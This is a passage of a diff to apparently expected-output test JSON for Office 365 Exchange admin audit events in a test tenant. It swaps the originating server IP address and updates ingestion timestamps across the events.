(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
 "code": "ExchangeAdmin",
 "provider": "Exchange",
 "kind": "event",
@@ -3173,12 +3173,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -3210,7 +3210,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -3222,8 +3222,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177679Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853167600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
 "code": "ExchangeAdmin",
 "provider": "Exchange",
 "kind": "event",
@@ -3243,12 +3243,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -3279,7 +3279,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -3291,8 +3291,8 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "event": {
- "ingested": "2021-06-17T07:32:50.177681600Z",
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"fd804781-7d7f-4d3a-1ef0-08d7ac0f47e4\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"HygieneSuite\",\"Value\":\"Premium\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
+ "ingested": "2021-12-09T13:42:30.853172700Z",
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"fd804781-7d7f-4d3a-1ef0-08d7ac0f47e4\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"HygieneSuite\",\"Value\":\"Premium\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
 "code": "ExchangeAdmin",
 "provider": "Exchange",
 "kind": "event",
@@ -3312,12 +3312,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -3348,7 +3348,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -3360,8 +3360,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177684300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853177600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
 "code": "ExchangeAdmin",
 "provider": "Exchange",
 "kind": "event",
@@ -3381,12 +3381,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -3417,7 +3417,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -3429,8 +3429,8 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "event": {
- "ingested": "2021-06-17T07:32:50.177687100Z",
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:06\",\"ExternalAccess\":true,\"Id\":\"627aa8ff-1411-475d-d202-08d7ac0f08a5\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance\",\"Operation\":\"New-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
+ "ingested": "2021-12-09T13:42:30.853184200Z",
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:06\",\"ExternalAccess\":true,\"Id\":\"627aa8ff-1411-475d-d202-08d7ac0f08a5\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance\",\"Operation\":\"New-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
 "code": "ExchangeAdmin",
 "provider": "Exchange",
 "kind": "event",
@@ -3450,12 +3450,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -3500,7 +3500,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -3512,8 +3512,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177689800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853190400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -3533,12 +3533,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3581,7 +3581,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -3593,8 +3593,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177692500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853196300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -3614,12 +3614,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3662,7 +3662,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -3674,8 +3674,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177695100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853203900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -3695,12 +3695,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3743,7 +3743,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
